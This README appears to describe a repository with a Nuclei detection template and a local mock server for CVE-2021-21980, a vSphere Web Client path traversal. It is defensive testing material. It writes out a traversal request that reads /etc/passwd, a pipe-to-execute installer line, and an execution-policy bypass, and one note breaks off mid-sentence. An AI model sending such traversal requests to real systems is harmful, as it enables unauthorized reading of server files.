## https://sploitus.com/exploit?id=FB7F6340-D6DB-5C56-9E7E-BD45A41EE5DA
Clippy of the Dead - CVE-2021-21980 testing environment and Nuclei template
=======================================================================
This repository contains a high-confidence Nuclei template to detect CVE-2021-21980
(vSphere Web Client path traversal) and a small mock environment that reproduces
the vulnerable behavior for safe local testing.
Files:
- `cve-2021-21980.yaml`: Nuclei template with multiple encoding variants and matchers
- `app.py`: A small Flask app simulating /eam/vib path traversal vulnerability
- `Dockerfile`: Container image for the mock server with a self-signed TLS cert
- `docker-compose.yml`: Runs the mock server listening on host 8443
- `requirements.txt`: Python dependencies
Disclaimer
----------
- This repository is for research, testing and defensive purposes only. Do not
use against any system you are not authorized to scan.
- This mock server is *not* VMware vCenter; it only simulates the vulnerable
behavior for safe PoC/testing.
How to run locally (Windows PowerShell example)
----------------------------------------------
1) Build and run the mock container:
```powershell
cd C:\Users\gui\Documents\hi
docker-compose up --build -d
```
The mock server will listen on `https://localhost:8443` (self-signed TLS certificate).
2) Quick curl check (insecure flag because self-signed cert):
```powershell
curl -k "https://localhost:8443/" # should return VMware vSphere Web Client (mock)
curl -k "https://localhost:8443/eam/vib?id=../../../../../../../../../../etc/passwd"
```
You should receive the content of the mock `/app/sensitive/passwd-mock` file.
3) Run Nuclei (install Nuclei first) to validate the template against the mock server:
```powershell
nuclei -t cve-2021-21980.yaml -u https://localhost:8443 -insecure
```
4) Output should show a match for the PoC if successful.
Testing notes
-------------
- If you want to test many encoding variants, set the Nuclei template to run with high verbosity.
- This mock server returns the mock file which replicates /etc/passwd; in a real environment
Automated test script
---------------------
Run `run_local_test.ps1` which builds, waits for readiness and executes the curl checks, plus Nuclei if available.
```powershell
powershell -ExecutionPolicy Bypass -File .\run_local_test.ps1
```
Install Nuclei on Windows (quick):
1) Using Scoop (recommended):
```powershell
iwr -useb get.scoop.sh | iex
scoop install coreutils
scoop install nuclei
```
2) Or download from releases and add to PATH:
```powershell
Invoke-WebRequest -Uri https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_windows_amd64.zip -OutFile nuclei.zip
Expand-Archive -Path nuclei.zip -DestinationPath .\nuclei
Add-Content -Path $PROFILE -Value 'set PATH=$Env:PATH;$(Resolve-Path .\nuclei)'
```
Notes
-----
If `nuclei` is not in PATH the `run_local_test.ps1` will execute up to the curl tests only.
If you get issue building docker image ensure Docker Desktop is installed and the 'Use the WSL 2 based engine' is enabled.
/etc/passwd or similar file will be returned if the server is vulnerable.
Security: Always have explicit authorization before scanning or exploiting systems.